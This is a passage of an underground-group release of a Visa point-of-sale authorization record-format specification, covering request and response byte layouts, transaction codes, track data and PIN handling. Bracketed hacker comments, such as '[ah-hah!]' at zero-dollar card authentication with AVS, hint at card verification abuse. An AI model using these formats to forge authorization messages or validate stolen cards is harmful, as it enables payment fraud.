+                                       &&
+                         theilluminatibarbershopquartet
+
+ greetz2; drdelam maldoror greenparadox kaleidox primalscream reddeath kerryk
+-------------------------- [ typed in true(c) 80 columns] ----------------------
+---------------------------- [ comments appear in []s ] ------------------------
+
+                                [ section one ]
+                            [ from the word of god ]
+
+          -------------------------------------------------------------
+          |  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  |
+          |  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  |
+          |    \\\\\     /////  /////  //////////// /////\\\\         |
+          |     \\\\\   /////  /////  /////        /////  \\\\\       |
+          |      \\\\\ /////  /////  ///////////  \\\\\\\\\\\\\\      |
+          |       \\\\\///   /////        /////  \\\\\\\\\\\\\\\\     |
+          |        \\\\\/   ///// ////////////  /////        \\\\\    |
+          |  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  |
+          |  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  |
+          -------------------------------------------------------------
+
+                        EXTERNAL INTERFACE SPECIFICATION
+                        --------------------------------
+                               SECOND GENERATION
+                          AUTHORIZATION RECORD FORMATS
+
+                               For Record Formats
+                           --------------------------
+                                J - PS/2000 REPS
+                             G - VisaNet Dial Debit
+
+1.0 INTRODUCTION
+
+ 2.0 APPLICABLE DOCUMENTS
+    2.01 RELATED VISA DOCUMENTS FOR AUTHORIZATION
+    2.02 RELATED VISA DOCUMENTS FOR DATA CAPTURE
+
+3.0 AUTHORIZATION RECORD FORMATS
+    3.01 REQUEST RECORD FORMAT
+    3.02 RESPONSE RECORD FORMAT
+
+4.0 REQUEST RECORD DATA ELEMENT DEFINITIONS
+    4.01 RECORD FORMAT
+    4.02 APPLICATION TYPE
+    4.03 MESSAGE DELIMITER
+    4.04 ACQUIRER BIN
+    4.05 MERCHANT NUMBER
+    4.06 STORE NUMBER
+    4.07 TERMINAL NUMBER
+    4.08 MERCHANT CATEGORY CODE
+    4.09 MERCHANT COUNTRY CODE
+    4.10 MERCHANT CITY CODE
+    4.11 TIME ZONE DIFFERENTIAL
+    4.12 AUTHORIZATION TRANSACTION CODE
+    4.13 TERMINAL IDENTIFICATION NUMBER
+    4.14 PAYMENT SERVICE INDICATOR
+    4.15 TRANSACTION SEQUENCE NUMBER
+    4.16 CARDHOLDER IDENTIFICATION DATA
+    4.17 ACCOUNT DATA SOURCE
+    4.18 CUSTOMER DATA FIELD
+       4.18.1 TRACK 1 READ DATA
+       4.18.2 TRACK 2 READ DATA
+       4.18.3 MANUALLY ENTERED ACCOUNT DATA (CREDIT CARD)
+          4.18.3.1 MANUALLY ENTERED ACCOUNT NUMBER
+          4.18.3.2 MANUALLY ENTERED EXPIRATION DATE
+       4.18.4 CHECK ACCEPTANCE IDENTIFICATION NUMBER
+          4.18.4.1 CHECK ACCEPTANCE ID
+          4.18.4.2 MANUALLY ENTERED CHECK ACCEPTANCE DATA
+    4.19 FIELD SEPARATOR
+    4.20 CARDHOLDER IDENTIFICATION DATA
+       4.20.1 STATIC KEY WITH TWENTY THREE BYTE CARDHOLDER ID
+       4.20.2 STATIC KEY WITH THIRTY TWO BYTE CARDHOLDER ID
+       4.20.3 DUK/PT KEY WITH THIRTY TWO BYTE CARDHOLDER ID
+       4.20.4 ADDRESS VERIFICATION SERVICE DESCRIPTION [hmmm...]
+    4.21 FIELD SEPARATOR
+    4.22 TRANSACTION AMOUNT
+    4.23 FIELD SEPARATOR
+    4.24 DEVICE CODE/INDUSTRY CODE
+    4.25 FIELD SEPARATOR
+    4.26 ISSUING INSTITUTION ID/RECEIVING INSTITUTION ID
+    4.27 FIELD SEPARATOR
+    4.28 SECONDARY AMOUNT (CASHBACK)
+    4.29 FIELD SEPARATOR
+    4.30 MERCHANT NAME
+    4.31 MERCHANT CITY
+    4.32 MERCHANT STATE
+    4.33 SHARING GROUP
+    4.34 FIELD SEPARATOR
+    4.35 MERCHANT ABA NUMBER
+    4.36 MERCHANT SETTLEMENT AGENT NUMBER
+    4.37 FIELD SEPARATOR
+    4.38 AGENT NUMBER
+    4.39 CHAIN NUMBER
+    4.40 BATCH NUMBER
+    4.41 REIMBURSEMENT ATTRIBUTE
+    4.42 FIELD SEPARATOR
+    4.43 APPROVAL CODE
+    4.44 SETTLEMENT DATE
+    4.45 LOCAL TRANSACTION DATE
+    4.46 LOCAL TRANSACTION TIME
+    4.47 SYSTEM TRACE AUDIT NUMBER
+    4.48 ORIGINAL AUTHORIZATION TRANSACTION CODE
+    4.49 NETWORK IDENTIFICATION CODE
+    4.50 FIELD SEPARATOR
+
+5.0 RESPONSE RECORD DATA ELEMENT DEFINITIONS
+    5.01 PAYMENT SERVICE INDICATOR
+    5.02 STORE NUMBER
+    5.03 TERMINAL NUMBER
+    5.04 AUTHORIZATION SOURCE CODE
+    5.05 TRANSACTION SEQUENCE NUMBER
+    5.06 RESPONSE CODE
+    5.07 APPROVAL CODE
+    5.08 LOCAL TRANSACTION DATE
+    5.09 AUTHORIZATION RESPONSE CODE
+    5.10 AVS RESULT CODE
+    5.11 TRANSACTION IDENTIFIER
+    5.12 FIELD SEPARATOR
+    5.13 VALIDATION CODE
+    5.14 FIELD SEPARATOR
+    5.15 NETWORK IDENTIFICATION CODE
+    5.16 SETTLEMENT DATE
+    5.17 SYSTEM TRACE AUDIT NUMBER
+    5.18 RETRIEVAL REFERENCE NUMBER
+    5.19 LOCAL TRANSACTION TIME
+
+6.0 CONFIRMATION RECORD DATA ELEMENT DEFINITIONS
+    6.01 NETWORK IDENTIFICATION CODE
+    6.02 SETTLEMENT DATE
+    6.03 SYSTEM TRACE AUDIT NUMBER
+
+7.0 CHARACTER CODE DEFINITIONS
+    7.01 TRACK 1 CHARACTER DEFINITION
+    7.02 TRACK 2 CHARACTER DEFINITION
+    7.03 AUTHORIZATION MESSAGE CHARACTER SET
+    7.04 CHARACTER CONVERSION SUMMARY
+    7.05 ACCOUNT DATA LUHN CHECK
+    7.06 CALCULATING AN LRC
+    7.07 TEST DATA FOR RECORD FORMAT "J"
+      7.07.1 TEST DATA FOR A FORMAT "J" AUTHORIZATION REQUEST
+      7.07.2 RESPONSE MESSAGE FOR TEST DATA
+
+-------------------------------------------------------------------------------
+
+1.0 INTRODUCTION
+
+This document describes the request and response record formats for the VisaNet
+second generation Point-Of-Sale (POS) authorization terminals and VisaNet
+Authorization services.  This document describes only record formats.  Other
+documents describe communication protocols and POS equipment processing
+requirements.  Figure 1.0 represents the authorization request which is
+transmitted to VisaNet using public communication services and the
+authorization response returned by VisaNet.  Debit transactions include a
+third confirmation message.
+
+POS DEVICE                                          VISANET
+----------                                          -------
+
+AUTHORIZATION
+  REQUEST
+    |           TRANSMITTED TO A
+    |---------->    VISANET                       AUTHORIZATION
+                 AUTHORIZATION                      RESPONSE
+                  HOST SYSTEM                          |
+                                                       |
+                             RETURNED BY THE           |
+                             VISANET HOST TO  <--------|
+                             THE POS TERMINAL
+
+DEBIT RESPONSE
+CONFIRMATION--------------->TRANSMITTED TO
+                            HOST SYSTEM
+
+                                   FIGURE 1.0
+                      Authorization request and response.
+
+This document describes the record formats to be used for the development of
+new applications.  Current formats or transition formats will be provided on
+request.  The usage of some fields have changed with the new record formats.
+Applications which were developed to previous specifications will continue to
+be supported by VisaNet services.  The new formats and field usage is provided
+with the intention of moving all new applications developed to the new formats.
+
+2.0 APPLICABLE DOCUMENTS
+
+   The following documents provide additional definitions and background.
+
+2.01 RELATED VISA DOCUMENTS FOR AUTHORIZATION
+
+  1. EIS1051 - External Interface Specification
+                   Second Generation
+            Authorization Link Level Protocol
+
+2.02 RELATED VISA DOCUMENTS FOR DATA CAPTURE
+
+   1. EIS1081 - External Interface Specification
+                    Second Generation
+              Data Capture Record Formats
+
+   2. EIS1052 - External Interface Specification
+                    Second Generation
+              Data Capture Link Level Protocol
+
+3.0 AUTHORIZATION RECORD FORMATS
+
+This section contains the record formats for the authorization request,
+response and confirmation records.  The ANSI X3.4 character set is used to
+represent all record data elements.  (See Section 7)
+
+In the record formats on the following pages, the column heading FORMAT is
+defined as:
+
+"NUM"  represents numeric data, the numbers 0 through 9, NO SPACES.
+"A/N"  represents alphanumeric data, the printing character set.
+"FS"   represents a field separator character as defined in ANSI X3.4 as
+       a "1C" hex
+
+3.01 REQUEST RECORD FORMAT
+
+Table 3.01b provides the record format for the authorization request records.
+Section 4 provides the data element definitions.
+
+The authorization request record is a variable length record.  The record
+length will depend on the source of the customer data and the type of
+authorization request.  Refer to Table 3.01c to determine which GROUPS to use
+from Table 3.01a
+
+TABLE 3.01a IS PROVIDED FOR REFERENCE REASONS ONLY.  ALL NEW APPLICATIONS
+            SHOULD USE ONE OF THE FOLLOWING RECORD FORMATS:
+
+RECORD  | APPLICATION |
+FORMAT  |    TYPE     | REMARKS
+-------------------------------------------------------------------------------
+   J    |   CREDIT    | All non-ATM card transactions (Visa cards, other credit
+        |             | cards, private label credit cards and check guarantee)
+   G    | DIAL DEBIT  | Visa supported ATM debit cards
+
+The selection of format type J and G or any other value from Table 3.01a will
+depend on the VisaNet services that are desired.  Contact your Visa POS member
+support representative for assistance in determining the required formats.
+
+                                  TABLE 3.01a
+                             Record Format Summary
+
+ Non-CVV       CVV       Terminal
+Compliant   Compliant   Generation   Description
+-------------------------------------------------------------------------------
+                0                    RESERVED
+    1           N         First      Vutran
+    2           8         First      Sweda
+    4           R         First      Verifone
+    6           P         First      Amex
+    7           3         First      Racal
+    A           Q         First      DMC
+    B           R         First      GTE & Omron    [velly intelestink]
+    C           9         First      Taltek
+    S           U         First      Datatrol - Standard Oil
+    D           T         First      Datatrol
+    E                                RESERVED
+    5           F         Second     Non-REPS-Phase 1 CVV
+                G         Second     Dial Debit
+                H         Second     Non-REPS-Phase 2 CVV
+                I         Second     RESERVED - Non-REPS Controller
+                J         Second     REPS - Terminal & Controller
+                K         Second     RESERVED
+                L         Second     RESERVED - Leased VAP
+                M         Second     RESERVED - Member Format
+               N-O                   RESERVED
+               V-Y                   RESERVED
+                Z         Second     RESERVED - SDLC Direct [hmmm]
+-------------------------------------------------------------------------------
+
+                                  TABLE 3.01b
+             Second Generation Authorization Request Record Format
+
+                                                                        see
+Group  Byte#  Length  Format  Name                                    section
+-------------------------------------------------------------------------------
+         1      1      A/N    Record Format                             4.01
+         2      1      A/N    Application Type                          4.02
+         3      1      A/N    Message Delimiter                         4.03
+        4-9     6      NUM    Acquirer Bin                              4.04
+       10-21   12      NUM    Merchant Number                           4.05
+       22-25    4      NUM    Store Number                              4.06
+       26-29    4      NUM    Terminal Number                           4.07
+       30-33    4      NUM    Merchant Category Code                    4.08
+       34-36    3      NUM    Merchant Country Code                     4.09
+       37-41    5      A/N    Merchant City Code (ZIP in the U.S.)      4.10
+       42-44    3      NUM    Time Zone Differential                    4.11
+       45-46    2      A/N    Authorization Transaction Code            4.12
+       47-54    8      NUM    Terminal Identification Number            4.13
+        55      1      A/N    Payment Service Indicator                 4.14
+       56-59    4      NUM    Transaction Sequence Number               4.15
+        60      1      A/N    Cardholder Identification Code            4.16
+        61      1      A/N    Account Data Field                        4.17
+     Variable  1-76           Customer Data Field                       4.18.x
+                              (See: DEFINITIONS in Table 3.01d)
+     Variable   1      "FS"   Field Separator                           4.19
+     Variable  0-32    A/N    Cardholder Identification Data            4.20
+     Variable   1      "FS"   Field Separator                           4.21
+     Variable  3-12    NUM    Transaction Amount                        4.22
+     Variable   1      "FS"   Field Separator                           4.23
+     Variable   2      A/N    Device Code/Industry Code                 4.24
+     Variable   1      "FS"   Field Separator                           4.25
+     Variable  0-6     NUM    Issuing/Receiving Institution ID          4.26
+ I   Variable   1      "FS"   Field Separator                           4.27
+     Variable  3-12    NUM    Secondary Amount (Cashback)               4.28
+II   Variable   1      "FS"   Field Separator                           4.29
+     Variable   25     A/N    Merchant Name                             4.30
+     Variable   13     A/N    Merchant City                             4.31
+     Variable   2      A/N    Merchant State                            4.33
+     Variable  1-14    A/N    Sharing Group                             4.33
+     Variable   1      "FS"   Field Separator                           4.34
+     Variable  0-12    NUM    Merchant ABA                              4.35
+     Variable  0-4     NUM    Merchant Settlement Agent Number          4.36
+     Variable   1      "FS"   Field Separator                           4.37
+     Variable   6      NUM    Agent Number                              4.38
+     Variable   6      NUM    Chain Number                              4.39
+     Variable   3      NUM    Batch Number                              4.40
+     Variable   1      A/N    Reimbursement Attribute                   4.41
+III  Variable   1      "FS"   Field Separator                           4.42
+     Variable   6      A/N    Approval Code                             4.43
+     Variable   4      NUM    Settlement Date (MMDD)                    4.44
+     Variable   4      NUM    Local Transaction Date (MMDD)             4.45
+     Variable   6      NUM    Local Transaction Time (HHMMSS)           4.46
+     Variable   6      A/N    System Trace Audit Number                 4.47
+     Variable   2      A/N    Original Auth. Transaction Code           4.48
+     Variable   1      A/N    Network Identification Code               4.49
+IV   Variable   1      "FS"   Field Separator                           4.50
+
+NOTE: The maximum length request can be as long as 290 bytes for an Interlink
+Debit Cancel request (including the STX/ETX/LRC).  Since some terminals may be
+limited to a 256 byte message buffer, the following tips can save up to 36
+bytes:
+
+     - Limit fields 4.22 and 4.28 to 7 digits
+     - Fields 4.26, 4.35 and 4.36 are not required for a debit request
+     - Field 4.33 can be limited to 10 bytes
+
+                                  TABLE 3.01C
+                      Legend for GROUP (from Table 3.01b)
+
+FOR THESE TRANSACTIONS, USE--------------------------------->GROUPS      RECORD
+                                                          I  II III IV   FORMAT
+
+Check guarantee                                           X                J
+
+Non-ATM card transactions (Visa cards, other              X  X             J
+credit cards, private label credit cards
+
+Visa supported ATM debit cards: Purchase, Return          X  X   X         G
+and Inquiry Request
+
+Visa supported ATM debit cards: Interlink Cancel          X  X   X   X     G
+Request
+
+                                  TABLE 3.01d
+             Definitions for Customer Data Field (from Table 3.01b)
+
+Length        Format        Field Name                                   See
+                                                                       Section
+MAGNETICALLY read credit cards (SELECT ONE):
+up to 76       A/N          Track 1 Read Data                           4.18.1
+up to 37       NUM          Track 2 Read Data                           4.18.2
+
+MANUALLY entered credit cards:
+up to 28       NUM          Manually Entered Account Number            4.18.3.1
+   1           "FS"         Field Separator
+   4           NUM          Manually Entered Expiration Date (MMYY)   4.18.3.2
+
+MACHINE read and MANUALLY entered check acceptance requests:
+ 1 to 28       A/N          Check Acceptance ID                        4.18.4.1
+   1           "FS"         Field Separator                            4.18.4.2
+ 3 to 6        A/N          Manually Entered Check Acceptance Data     4.18.4.2
+
+MAGNETICALLY read ATM debit cards:
+up to 37       NUM          Track 2 Read Data                           4.18.2
+
+3.02 RESPONSE RECORD FORMAT
+
+Table 3.02a provides the record format for the authorization response records.
+Section 5 provides the data element definitions.
+
+The authorization response record is variable length for record formats "J" &
+"G".  Refer to Table 3.02b to determine which GROUPS to use from Table 3.02a.
+
+                                  Table 3.02a
+                Second Generation Authorization Response Record
+                                                                        see
+Group  Byte#  Length  Format  Name                                    section
+--------------------------------------------------------------------------------
+        1       1      A/N    Payment Service Indicator                 5.01
+       2-5      4      NUM    Store Number                              5.02
+       6-9      4      NUM    Terminal Number                           5.03
+        10      1      A/N    Authorization Source Code                 5.04
+      11-14     4      NUM    Transaction Sequence Number               5.05
+      15-16     2      A/N    Response Code                             5.06
+      17-22     6      A/N    Approval Code                             5.07
+      23-28     6      NUM    Local Transaction Date (MMDDYY)           5.08
+      29-44     16     A/N    Authorization Response Message            5.09
+       45       1      A/N    AVS Result Code                           5.10
+    Variable   0/15    NUM    Transaction Identifier                    5.11
+    Variable    1      "FS"   Field Separator                           5.12
+    Variable   0/4     A/N    Validation Code                           5.13
+I   Variable    1      "FS"   Field Separator                           5.14
+    Variable    1      A/N    Network Identification Code               5.15
+    Variable    4      NUM    Settlement Date (MMDD)                    5.16
+    Variable    6      A/N    System Trace Audit Number                 5.17
+    Variable    12     A/N    Retrieval Reference Number                5.18
+II  Variable    6      NUM    Local Transaction Time (HHMMSS)           5.19
+
+                                  Table 3.02b
+                      Legend for GROUP (from Table 3.02a)
+
+FOR THESE TRANSACTIONS, USE--------------------------------->GROUPS      RECORD
+                                                             I   II      FORMAT
+
+All non-ATM card transactions (Visa cards, other credit      X             J
+cards, private label credit cards and check guarantee)
+
+Visa supported ATM debit cards: Purchase, Return, Inquiry    X    X        G
+Request and Interlink Cancel Request
+
+3.03 CONFIRMATION RECORD FORMAT (ATM DEBIT ONLY)
+
+Table 3.03 provides the record format for the second generation debit response
+confirmation record.  Section 6 provides the data element definitions.
+
+The debit response confirmation record is a fixed length record.
+
+                                   TABLE 3.03
+              Second Generation Debit Response Confirmation Record
+
+                                                                        see
+Group  Byte#  Length  Format  Name                                    section
+--------------------------------------------------------------------------------
+         1      1      A/N    Network ID Code                           6.01
+        2-5     4      NUM    Settlement Date (MMDD)                    6.02
+I       6-11    6      A/N    System Trace Audit Number                 6.03
+
+4.0 REQUEST RECORD DATA ELEMENT DEFINITIONS
+
+The following subsections will define the authorization request record data
+elements.
+
+4.01 RECORD FORMAT
+
+There are several message formats defined within the VisaNet systems.  The
+second generation authorization format is specified by placing one of the
+defined values in the record format field.  Table 4.01 provides a brief summary
+of the current formats.
+
+                                   TABLE 4.01
+                VisaNet Authorization Record Format Designators
+
+RECORD FORMAT                        RECORD DESCRIPTION
+--------------------------------------------------------------------------------
+      J             All non-ATM card transactions (Visa cards, other credit
+                    cards, private label credit cards and check guarantee)
+      G             Visa supported ATM debit cards
+
+4.02 APPLICATION TYPE
+
+The VisaNet authorization system supports multiple application types ranging
+from single thread first generation authorization to interleaved leased line
+authorization processing.  Table 4.02 provides a summary of application type.
+
+                                   TABLE 4.02
+                        VisaNet Application Designators
+
+APPLICATION                                                        USE WITH
+   TYPE             APPLICATION DESCRIPTION                        REC. FMT.
+--------------------------------------------------------------------------------
+    0               Single authorization per connection             J and G
+    2               Multiple authorizations per connection          J and G
+                    single-threaded
+    4               Multiple authorizations per connect,               J
+                    interleaved
+    6               Reserved for future use                           ---
+    8               Reserved for future use                           ---
+ 1,3,5,7            Reserved for VisaNet Central Data Capture (CDC)   ---
+    9               Reserved for VisaNet Down Line Load               ---
+   A-Z              Reserved for future use                           ---
+
+4.03 MESSAGE DELIMITER
+
+The message delimiter separates the format and application type designators from
+the body of the message.  The message delimiter is defined as a "." (period)
+
+4.04 ACQUIRER BIN
+
+This field contains the Visa assigned six-digit Bank Identification Number (BIN)
+The acquirer BIN identifies the merchant signing member that signed the merchant
+using the terminal.
+
+NOTE: The merchant receives this number from their signing member.
+
+4.05 MERCHANT NUMBER
+
+This field contains a NON-ZERO twelve digit number, assigned by the signing
+member and/or the merchant, to identify the merchant within the member systems.
+The combined Acquirer BIN and Merchant Number are required to identify the
+merchant within the VisaNet systems.
+
+4.06 STORE NUMBER
+
+This field contains a NON-ZERO four-digit number assigned by the signing member
+and/or the merchant to identify the merchant store within the member systems.
+The combined Acquirer BIN, Merchant Number, and Store Number are required to
+identify the store within the VisaNet systems.
+
+4.07 TERMINAL NUMBER
+
+This field contains a NON-ZERO four-digit number assigned by the signing member
+and/or the merchant to identify the merchant store within the member systems.
+This field can be used by systems which use controllers and/or concentrators to
+identify the devices attached to the controllers and/or concentrators.
+
+4.08 MERCHANT CATEGORY CODE
+
+This field contains a four-digit number assigned by the signing member from a
+list of category codes defined in the VisaNet Merchant Data Standards Handbook
+to identify the merchant type.
+
+4.09 MERCHANT COUNTRY CODE
+
+This field contains a three-digit number assigned by the signing member from a
+list of country codes defined in the VisaNet V.I.P. System Message Format
+Manuals to identify the merchant location country.
+
+4.10 MERCHANT CITY CODE
+
+This field contains a five character code used to further identify the merchant
+location.  Within the United States, the give high order zip code digits of the
+address of the store location are used.  Outside of the United States, this
+field will be assigned by the signing member.
+
+4.11 TIME ZONE DIFFERENTIAL
+
+This field contains a three-digit code used to calculate the local time within
+the VisaNet authorization system.  It is calculated by the signing member,
+providing the local time zone differential from Greenwich Mean Time (GMT).  The
+first two digits specify the magnitude of the differential.  Table 4.11 provides
+a brief summary of the Time Zone Differential codes.
+
+                                   TABLE 4.11
+                       Time Zone Differential Code Format
+
+   Byte #     Length     Format                     Contents
+--------------------------------------------------------------------------------
+     1          1        NUMERIC          DIRECTION
+                                          0 = Positive, Local Ahead of GMT,
+                                              offset in hours
+                                          1 = Negative, Local Time behind GMT,
+                                              offset in hours
+                                          2 = Positive, offset in 15 minute
+                                              increments
+                                          3 = Negative, offset in 15 minute
+                                              increments
+                                          4 = Positive, offset in 15 minute
+                                              increments, participating in
+                                              daylight savings time
+                                          5 = Negative, offset in 15 minute
+                                              increments, participating in
+                                              daylight savings time
+                                        6-9 = INVALID CODES
+   2-3           2       NUMERIC           MAGNITUDE
+                                           For Byte #1 = 0 or 1
+                                               0 <= MAGNITUDE <= 12
+                                           For Byte #1 = 2 through 5
+                                               0 <= MAGNITUDE <= 48
+--------------------------------------------------------------------------------
+A code of 108 indicates the local Pacific Standard time which is 8 hours behind
+GMT.
+
+4.12 AUTHORIZATION TRANSACTION CODE
+
+This field contains a two-character code defined by VisaNet and generated by the
+terminal identifying the type of transaction for which the authorization is
+requested.  Table 4.12 provides a summary of the transaction codes.
+
+                                   TABLE 4.12
+                        Authorization Transaction Codes
+
+TRAN
+CODE       TRANSACTION DESCRIPTION
+-------------------------------------------------------------------------------
+54         Purchase
+55         Cash Advance
+56         Mail/Telephone Order
+57         Quasi Cash
+58         Card Authentication - Transaction Amt & Secondary Amt must equal
+           $0.00, AVS may be requested [ah-hah!]
+64         Repeat: Purchase
+65         Repeat: Cash Advance
+66         Repeat: Mail/Telephone Order (MO/TO)
+67         Repeat: Quasi Cash
+68         Repeat: Card Authentication - Transaction Amt & Secondary Amt must
+           equal $0.00, AVS may be requested
+70         Check guarantee, must include RIID (field 4.26)
+81         Proprietary Card
+84         Private Label Purchase
+85         Private Label, Cash Advance
+86         Private Label Mail/Telephone Order (MO/TO)
+87         Private Label Quasi Cash
+88         Private Label Card Authentication - Transaction Amt & Secondary Amt
+           must equal $0.00, AVS may be requested
+93         Debit Purchase
+94         Debit Return
+95         Interlink Debit Cancel (see NOTE below)
+--------------------------------------------------------------------------------
+
+NOTE (for TRANSACTION CODE = 95)
+--------------------------------
+    - For Interlink Debit CANCEL request message, all of the fields in
+      Groups I and II will come from the original transaction request or the
+      original transaction response, with the exception of the following:
+         - The AUTHORIZATION TRANSACTION CODE will need to be changed to the
+           Debit CANCEL code.
+         - The TRANSACTION SEQUENCE NUMBER should be incremented in the
+           normal fashion.
+         - The CUSTOMER DATA FIELD and the CARDHOLDER IDENTIFICATION DATE
+           (PIN) will need to be re-entered.
+
+4.13 TERMINAL IDENTIFICATION NUMBER
+
+This field contains an eight-digit code that must be greater than zero, defined
+by the terminal down line load support organization.  Support may be provided by
+the Visa's Merchant Assistance Center (MAC), the signing member, or a third
+party organization.  The terminal ID is used to uniquely identify the terminal
+in the terminal support system and identification for the VisaNet Central Data
+Capture (CDC).  The terminal ID may not be unique within the VisaNet system.
+Each terminal support provider and member that provides its own terminal support
+can assign potentially identical terminal IDs within its system.  The terminal
+ID can be used by the terminal down line load system to access the terminal
+application and parameter data from a system data base when down line loading a
+terminal. [huh?]
+
+NOTE: It is recommended that [the] Terminal ID Number should be unique within
+the same Acquirer's BIN.
+
+4.14 PAYMENT SERVICE INDICATOR
+
+This is a one-character field used to indicate a request for REPS qualification.
+Table 4.14 provides a summary of the codes.
+
+                                   TABLE 4.14
+                        Payment Service Indicator Codes
+
+                         RECORD
+                         FORMAT    VALUE    DESCRIPTION
+                         ------------------------------
+                           J         Y         Yes
+                           J         N         No
+                           G         Y         Yes
+                           G         N         No
+                         ------------------------------ [repetitive? you bet]
+
+4.15 TRANSACTION SEQUENCE NUMBER
+
+This field contains a four-digit code which is generated by the terminal as the
+sequence number for the transaction.  The sequence number is used by the
+terminal to match request and response messages.  This field is returned by
+VisaNet without sequence verification.  The sequence number is incremented with
+wrap from 9999 to 0001.
+
+4.16 CARDHOLDER IDENTIFICATION CODE
+
+This one-character field contains a code that indicates the method used to
+identify the cardholder.  Table 4.16 provides a summary of the codes.
+
+                                   TABLE 4.16
+                        Cardholder Identification Codes
+
+  ID CODE     IDENTIFICATION METHOD
+--------------------------------------------------------------------------------
+     A        Personal Identification Number-23 byte static key (non-USA) fnord
+     B        PIN at Automated Dispensing Machine - 32 byte static key
+     C        Self Svc Limited Amount Terminal (No ID method available)
+     D        Self-Service Terminal            (No ID method available)
+     E        Automated Gas Pump               (No ID method available)
+     K        Personal Identification Number - 32 byte DUK/PT
+     N        Customer Address via Address Verification Service (AVS)
+     S        Personal Identification Number - 32 byte static key
+     Z        Cardholder Signature - Terminal has a PIN pad
+     @        Cardholder Signature - No PIN pad available
+F-J,L,M,O-R   Reserved for future use
+    T-Y
+--------------------------------------------------------------------------------
+
+4.17 ACCOUNT DATA SOURCE
+
+This field contains a one-character code defined by Visa and generated by the
+terminal to indicate the source of the customer data entered in field 4.18.
+Table 4.17 provides a summary of codes
+
+                                   TABLE 4.17
+                           Account Data Source Codes
+
+ACCOUNT DATA
+SOURCE CODE      ACCOUNT DATA SOURCE CODE DESCRIPTION
+--------------------------------------------------------------------------------
+     A           RESERVED - Bar-code read
+     B           RESERVED - OCR read
+     D           Mag-stripe read, Track 2
+     H           Mag-stripe read, Track 1
+     Q           RESERVED - Manually keyed, bar-code capable terminal
+     R           RESERVED - Manually keyed, OCR capable terminal
+     T           Manually keyed, Track 2 capable
+     X           Manually keyed, Track 1 capable
+     @           Manually keyed, terminal has no card reading capability
+C,E-G,I-P,S,     RESERVED for future use
+U-W,Y-Z,0-9
+--------------------------------------------------------------------------------
+NOTE:
+   - If a dual track reading terminal is being used, be sure to enter the
+     correct value of "D" or "H" for the magnetic data that is transmitted
+   - When data is manually keyed at a dual track reading terminal, enter either
+     a "T" or an "X"
+
+4.18 CUSTOMER DATA FIELD
+
+This is a variable length field containing customer account or check acceptance
+ID data in one of three formats.  The cardholder account information can be read
+d from the card or it may be entered manually.  Additionally the terminal can be
+used for check authorization processing with the check acceptance identification
+number entered by the operator for transmission in this field.
+
+NOTE: For all POS terminals operated under VISA U.S.A. Operating Regulations,
+the following requirement must be available as an operating option if the
+merchant location is found to be generating a disproportionately high percentage
+of Suspect Transactions [lets get downright hostile about it] as defined in
+chapter 9.10 of the VISA U.S.A. Operating Regulations.  Specifically, chapter
+9.10.B.2 requires that:
+
+   - The terminal must read the track data using a magnetic stripe reading
+     terminal
+   - The terminal must prompt the wage slave to manually enter the last four
+     digits of the account number
+   - The terminal must compare the keyed data with the last four digits of the
+     account number in the magnetic stripe
+   - If the compare is successful, the card is acceptable to continue in the
+     authorization process and the terminal must transmit the full, unaltered
+     contents of the magnetic stripe in the authorization message.
+   - If the compare fails, the card should not be honored at the Point of Sale
+
+4.18.1 TRACK 1 READ DATA
+
+This is a variable length field with a maximum data length of 76 characters.
+
+The track 1 data read from the cardholder's card is checked for parity and LRC
+errors and then converted from the six-bit characters encoded on the card to
+seven-bit characters as defined in ANSI X3.4.  The character set definitions are
+provided in section 7 for reference.  As part of the conversion the terminal
+will strip off the starting sentinel, ending sentinel, and LRC characters.  The
+separators are to be converted to a "^" (HEX 5E) character.  The entire
+track must be provided in the request message.  The character set and data
+content are different between track 1 and track 2.  The data read by a track 2
+device can not be correctly reformatted and presented as though it were read by
+a track 1 device.  [aw shucks]  The converted data can not be modified by adding
+or deleting non-framing characters and must be a one-for-one representation of
+the character read from the track.
+
+4.18.2 TRACK 2 READ DATA
+
+This is a variable length field with a maximum data length of 37 characters.
+
+The track 2 data read from the cardholder's card is checked for parity and LRC
+errors and then converted from the six-bit characters encoded on the card to
+seven-bit characters as defined in ANSI X3.4.  The character set definitions are
+provided in section 7 for reference.  As part of the conversion the terminal
+will strip off the starting sentinel, ending sentinel, and LRC characters.  The
+separators are to be converted to a  "^" (HEX 5E) character.  The entire
+track must be provided in the request message.  The character set and data
+content are different between track 2 and track 1.  The data read by a track 1
+device can not be correctly reformatted and presented as though it were read by
+a track 2 device.  The converted data can not be modified by adding or deleting
+non-framing characters and must be a one-for-one representation of the character
+read from the track. [repetitive? you bet]
+
+4.18.3 MANUALLY ENTERED ACCOUNT DATA (CREDIT CARD)
+
+The customer credit card data may be key entered when the card can not be read,
+when a card is not present, or when a card reader is not available.
+
+4.18.3.1 MANUALLY ENTERED ACCOUNT NUMBER
+
+This is a variable length field consisting of 5 to 28 alphanumeric characters.
+
+The embossed cardholder data, that is key entered, is validated by the terminal
+using rules for each supported card type.  For example, both Visa and Master
+Card include a mod 10 check digit as the last digit of the Primary Account
+Number.  The Primary Account Number (PAN) is encoded as seven-bit characters
+as defined in ANSI X3.4.  The PAN is then provided in the manually entered
+record format provided in Table 3.01b.  The PAN must be provided without
+embedded spaces.
+
+4.18.3.2 MANUALLY ENTERED EXPIRATION DATE
+
+This four-digit field contains the card expiration date in the form MMYY (month-
+month-year-year)
+
+4.18.4 CHECK ACCEPTANCE IDENTIFICATION NUMBER
+
+The customer data may be card read or manually key entered for check acceptance
+transactions.
+
+4.18.4.1 CHECK ACCEPTANCE ID
+
+This field is a variable length field consisting of 1 to 28 alphanumeric
+characters.  The check acceptance vendor will provide the data format and
+validation rules to be used by the terminal.  Typically the ID consists of a
+two-digit state code and an ID which may be the customer's drivers license
+number.
+
+4.18.4.2 MANUALLY ENTERED CHECK ACCEPTANCE DATA
+
+This six-character field contains the customer birth date or a control code in
+the form specified by the check acceptance processor.
+
+4.19 FIELD SEPARATOR
+
+The authorization record format specifies the use of the "FS" character.
+
+4.20 CARDHOLDER IDENTIFICATION DATA
+
+This field will be 0, 23, 29 or 32 characters in length.  The cardholder ID
